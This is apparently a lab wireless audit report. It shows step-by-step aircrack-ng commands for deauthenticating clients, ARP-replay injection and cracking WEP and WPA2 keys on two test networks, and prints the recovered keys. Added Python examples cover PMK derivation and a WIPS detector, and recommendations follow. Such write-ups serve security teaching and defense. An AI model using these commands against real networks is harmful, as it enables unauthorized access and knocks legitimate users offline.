Post on 05-Jul-2020


Pwn Security Labs

Wireless Security Audit Report

[email protected]

Page 1


Table of Contents

1. Table of Contents ....................... 2
   1.1 Contents of What's In Scope of the Security Audit ....................... 3
2. Stage 1 ....................... 4
   2.1 Wireless Network Key ....................... 4
   2.2 Screenshots ....................... 4
   2.3 Steps ....................... 5
3. Stage 3 ....................... 9
   3.1 Wireless Network Key ....................... 9
   3.2 Screenshots ....................... 9
   3.3 Steps ....................... 10
4. Recommendations for Securing Wireless Networks ....................... 14


1.1 Contents of What's In Scope of the Security Audit

The following network(s) are in scope of the wireless security audit.

ESSID: Stage-1
● BSSID: 00:C0:CA:9F:F2:76
● Channel #: 1

ESSID: Stage-3
● BSSID: 00:C0:CA:9F:F2:76
● Channel #: 1


2. Stage-1

2.1 Network Key

Target Network: Stage-1
Network Key: “aabbccddee”

2.2 Screenshots


2.3 Steps

Place the wireless card into monitor mode.

Command: “airmon-ng start wlan0”

Listen in on the target network “Stage-1” with airodump-ng.

Command: “airodump-ng --bssid 00:C0:CA:9F:F2:76 --channel 1 --write Stage-1 wlan0mon”

Ran a fake authentication attack against the target access point to associate our wireless card's MAC address with the network.

Command: “aireplay-ng -1 60 -a 00:C0:CA:9F:F2:76 wlan0mon”


As suspected, the fake authentication attack was successful.

In another window, started an aireplay-ng ARP-replay attack against “Stage-1” to listen on the network for an ARP packet from the client “00:0F:00:73:C6:9E”.

Command: “aireplay-ng -3 -b 00:C0:CA:9F:F2:76 -h 00:C0:CA:96:DD:2F wlan0mon”

Sent deauthentication packets to the connected client “00:0F:00:73:C6:9E”.

Command: “aireplay-ng -0 1 -a 00:C0:CA:9F:F2:76 -c 00:0F:00:73:C6:9E wlan0mon”

With the ARP-replay attack window still running, you can see we captured an ARP packet from the network as the client “00:0F:00:73:C6:9E” re-authenticates to the access point. Replaying that packet floods the network with ARP packets, and the access point generates a new IV for every ARP packet sent from our wireless card.


With aireplay-ng injecting ARP packets into the network, airodump-ng has captured more network traffic.


With airodump-ng still running, we crack the network key using aircrack-ng.

Command: “aircrack-ng Stage-1-01.cap”


3. Stage-3

3.1 Network Key

Target Network: Stage-3
Network Key: “crackme12345678”

3.2 Screenshots


3.3 Steps

Place our wireless card into monitor mode.

Command: “airmon-ng start wlan0”

Listen in on the target network “Stage-3” with airodump-ng.

Command: “airodump-ng --bssid 00:C0:CA:9F:F2:76 --channel 1 --write stage-3 wlan0mon”

Sent a directed deauthentication attack to the connected client to force a 4-way handshake.

Command: “aireplay-ng -0 1 -a 00:C0:CA:9F:F2:76 -c 00:0F:00:73:C6:9E wlan0mon”


And as suspected, airodump-ng captured a 4-way handshake as the client “00:0F:00:73:C6:9E” re-authenticates to the network.

“wpaclean” was used to clean the airodump-ng capture file so that it only contains the 4-way handshake, and then we verify the handshake with pyrit's analyze command.

Command: “pyrit -r stage-3-clean analyze”


We used airolib-ng to create rainbow tables to speed up the WPA2 cracking process by generating precomputed PMKs (Pairwise Master Keys), issuing the following commands.

Command: “airolib-ng testdb --import essid essid.txt”

Command: “airolib-ng testdb --import passwd wordlist.txt”

Command: “airolib-ng testdb --batch”


Then we use aircrack-ng with the precomputed database to crack the WPA2 password.

Command: “aircrack-ng -r testdb stage-3-clean”
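The airolib-ng steps above precompute one PMK per (ESSID, passphrase) pair. The Python below is an added example written for this page, not part of the Pwn Security Labs report or of the aircrack-ng suite: it reproduces the IEEE 802.11i passphrase-to-PMK derivation that airolib-ng's --batch performs (PBKDF2-HMAC-SHA1 with the ESSID as salt and 4096 rounds), checks it against the IEEE 802.11i known-answer vector, and shows that a table built for one ESSID shares nothing with a table built for another. The function names (derive_pmk, build_pmk_table, table_is_essid_bound, ieee_test_vector_ok, hmac_sha1_calls) and the candidate lists are the example's own assumptions; the ESSIDs and the Stage-3 key come from the report.

```python
import hashlib

PBKDF2_ROUNDS = 4096   # fixed by IEEE 802.11i for passphrase-to-PSK mapping
PMK_LEN = 32           # 256-bit PMK


def derive_pmk(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes).
    This is the per-candidate work that airolib-ng --batch precomputes."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError('WPA/WPA2 passphrases are 8 to 63 characters')
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode('ascii'),
                               essid.encode('utf-8'), PBKDF2_ROUNDS, PMK_LEN)


def build_pmk_table(essid, candidates):
    """Precompute {passphrase: pmk_hex} for one ESSID, like airolib-ng's essid x passwd batch."""
    return {p: derive_pmk(p, essid).hex() for p in candidates}


def table_is_essid_bound(candidates, essid_a, essid_b):
    """True when the table built for essid_a shares no PMK with the one for essid_b,
    i.e. the precomputation cannot be reused against a differently named network."""
    pmks_a = set(build_pmk_table(essid_a, candidates).values())
    pmks_b = set(build_pmk_table(essid_b, candidates).values())
    return pmks_a.isdisjoint(pmks_b)


def ieee_test_vector_ok():
    """Known-answer check: IEEE 802.11i Annex H vector, passphrase 'password', SSID 'IEEE'."""
    expected = 'f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e'
    return derive_pmk('password', 'IEEE').hex() == expected


def hmac_sha1_calls(n_candidates):
    """HMAC-SHA1 invocations needed to derive PMKs for n candidates: two 20-byte PBKDF2
    blocks cover 32 bytes, each costing 4096 HMACs. This is the work a precomputed table
    moves offline, and it is the same for an 8-character and a 63-character passphrase."""
    return n_candidates * 2 * PBKDF2_ROUNDS


if __name__ == '__main__':
    # Constructed candidate list (assumption of the example) containing the report's Stage-3 key.
    candidates = ['crackme12345678', 'correct horse battery staple']
    print('IEEE vector OK:', ieee_test_vector_ok())
    print('Stage-3 table:', build_pmk_table('Stage-3', candidates))
    print('Reusable for Stage-1?', not table_is_essid_bound(candidates, 'Stage-3', 'Stage-1'))
    print('HMAC-SHA1 calls for 1e6 candidates:', hmac_sha1_calls(10**6))
```

Because the ESSID is the salt, the testdb built here for “Stage-3” is useless against a network with any other name, and the per-candidate cost does not depend on passphrase length; the defender's lever is therefore the size and unpredictability of the candidate space (recommendation 4.1) together with an ESSID that does not appear in anyone's precomputed table.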


4. Recommendations for Securing Wireless Networks

4.1 Use WPA2

Don't use WEP, as this report shows how easy it is to crack a WEP-based network. Using WPA2 encryption with a long password is much safer and makes it much harder for attackers to successfully crack your WiFi password; as you were shown earlier, it was easy to gain unauthorized access even to a WPA2 network. The longer the password, the longer it is going to take attackers to crack the WPA2 password. Most of the time people don't change their passwords, or they choose simple ones, which in turn leaves them extremely vulnerable.

4.2 Use a WIPS

A Wireless Intrusion Prevention System (WIPS) is IDS/IPS-based technology for wireless networks that helps detect wireless attacks against your network, with notifications in real time.
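The deauthentication bursts in Stages 1 and 3 and the ARP-replay injection in Stage 1 are exactly the traffic a WIPS is meant to notice. The Python below is an added example written for this page, not part of the report or of any WIPS product: a minimal 802.11 MAC-header parser plus a sliding-window detector that alerts on a deauthentication flood against a BSSID, an authentication storm from one station, and repeated injection of a byte-identical data frame from one station (the signature of aireplay-ng -3 style replay). The capture it runs on is constructed inline using the report's BSSID, client MAC and auditor MAC; the thresholds, function names and everything in the frame bodies beyond the standard 24-byte header are the example's own assumptions.

```python
import struct
from collections import defaultdict

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_AUTH, SUBTYPE_DEAUTH = 0xB, 0xC


def mac_str(b):
    return ':'.join(f'{x:02X}' for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(':'))


def parse_frame(raw):
    """Decode the 24-byte 802.11 MAC header. Which address is the BSSID depends on To/From DS."""
    if len(raw) < 24:
        raise ValueError('shorter than an 802.11 MAC header')
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    to_ds, from_ds = fc1 & 0x1, (fc1 >> 1) & 0x1
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    if to_ds and not from_ds:        # station -> AP: addr1 = BSSID, addr2 = source
        bssid, src = a1, a2
    elif from_ds and not to_ds:      # AP -> station: addr2 = BSSID, addr3 = source
        bssid, src = a2, a3
    else:                            # management and ad hoc frames: addr3 = BSSID, addr2 = source
        bssid, src = a3, a2
    return {'type': ftype, 'subtype': subtype, 'src': mac_str(src),
            'bssid': mac_str(bssid), 'body': raw[24:]}


def _window_count(bucket, ts, window):
    """Append ts, drop entries older than `window` seconds, return how many remain."""
    bucket.append(ts)
    while ts - bucket[0] > window:
        bucket.pop(0)
    return len(bucket)


def detect(frames, window=1.0, deauth_limit=5, auth_limit=10, replay_limit=20):
    """frames: iterable of (timestamp_seconds, raw_80211_bytes) in time order.
    Returns [(alert_kind, offending_address)], at most one alert per key."""
    limits = {'deauth-flood': deauth_limit, 'auth-storm': auth_limit, 'frame-replay': replay_limit}
    buckets, fired, alerts = defaultdict(list), set(), []
    for ts, raw in frames:
        f = parse_frame(raw)
        if f['type'] == TYPE_MGMT and f['subtype'] == SUBTYPE_DEAUTH:
            kind, key, who = 'deauth-flood', f['bssid'], f['bssid']
        elif f['type'] == TYPE_MGMT and f['subtype'] == SUBTYPE_AUTH:
            kind, key, who = 'auth-storm', f['src'], f['src']
        elif f['type'] == TYPE_DATA:
            # byte-identical payload from the same source: a replayed (re-injected) frame
            kind, key, who = 'frame-replay', (f['src'], f['body']), f['src']
        else:
            continue
        if _window_count(buckets[(kind, key)], ts, window) >= limits[kind] and (kind, key) not in fired:
            fired.add((kind, key))
            alerts.append((kind, who))
    return alerts


def build_frame(fc0, addr1, addr2, addr3, body, flags=0):
    """Assemble a minimal 802.11 frame: frame control, duration 0, three addresses, seq 0, body."""
    return bytes([fc0, flags, 0, 0]) + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3) + b'\x00\x00' + body


# Addresses from the report: access point, the legitimate client, and the auditor's injecting card.
AP, CLIENT, AUDITOR = '00:C0:CA:9F:F2:76', '00:0F:00:73:C6:9E', '00:C0:CA:96:DD:2F'
BROADCAST = 'FF:FF:FF:FF:FF:FF'


def sample_capture():
    """Constructed capture (not real traffic): benign client data, a slow fake authentication,
    an ARP-replay burst and a deauthentication burst."""
    frames = []
    for i in range(10):   # benign WEP data from the client: each frame carries a fresh IV and differs
        body = bytes([i, 0x10, 0x20, 0x00]) + bytes([(i * 7) % 256]) * 36
        frames.append((0.1 * i, build_frame(0x08, AP, CLIENT, BROADCAST, body, flags=0x41)))
    for i in range(2):    # like "aireplay-ng -1 60": one authentication request per minute
        frames.append((0.5 + 60.0 * i, build_frame(0xB0, AP, AUDITOR, AP, struct.pack('<HHH', 0, 1, 0))))
    arp = bytes([0xAA, 0xBB, 0xCC, 0x00]) + b'\x55' * 36   # one captured ARP request (IV + ciphertext)
    for i in range(25):   # like "aireplay-ng -3": the same frame re-injected 25 times in half a second
        frames.append((2.0 + 0.02 * i, build_frame(0x08, AP, AUDITOR, BROADCAST, arp, flags=0x41)))
    for i in range(6):    # like "aireplay-ng -0 1": deauthentication frames spoofed from the AP
        frames.append((3.0 + 0.01 * i, build_frame(0xC0, CLIENT, AP, AP, struct.pack('<H', 7))))
    frames.sort(key=lambda f: f[0])
    return frames


def run_demo():
    return detect(sample_capture())


if __name__ == '__main__':
    for kind, who in run_demo():
        print(f'ALERT {kind} from {who}')
```

Two things worth noticing in the output: the replay alert names the auditor's card, because identical injected frames are keyed on the transmitting station rather than on the BSSID, and the slow fake authentication (one request per minute, as with aireplay-ng -1 60) never trips the rate rule, so a WIPS that relies only on rate thresholds should also correlate unknown stations that become associated with the BSSID.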
